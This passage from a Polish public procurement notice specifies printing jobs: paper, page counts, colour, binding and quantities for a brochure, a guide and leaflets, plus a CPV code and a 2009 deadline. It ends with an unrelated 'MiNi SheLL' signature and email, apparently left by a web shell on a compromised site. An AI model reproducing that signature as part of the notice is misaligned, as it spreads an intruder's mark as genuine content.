- papier offset 80 gr. + 4 str. okładka kreda 300 gr.
- objętość 44 str. + 4 strony okładka zabezpieczona laminat błysk
- kolorystyka 1 x 1 + okładka 4x 0
- szycie zeszytowe 	50
		b)przewodnik:
- format A4
- papier offset 80 gr. + 4 str. okładka kreda 300 gr.
- objętość 162 str. + 4 strony okładka 
- kolorystyka 156 str. 1 x 1; 6 stron 1x 0 + okładka 4x 0
- szycie zeszytowe, 
- oprawa klejona,
- okładka laminowana - folia błysk	60
		c)informacja podstawowa:
- format A4
- papier offset 80 gr. + 4 str. okładka kreda 300 gr.
- objętość 20 str. + 4 strony okładka folia błysk
- kolorystyka 1 x 1 + okładka 4x 0
- szycie zeszytowe	1350
		d)
- format A4,
- kolorystyka 1 x 1,
- objętość do 100 stron,
- papier offset 80g,
- okładka:4 x 0, 
- papier: karton do 300g,
- oprawa klejona	1200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.23.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com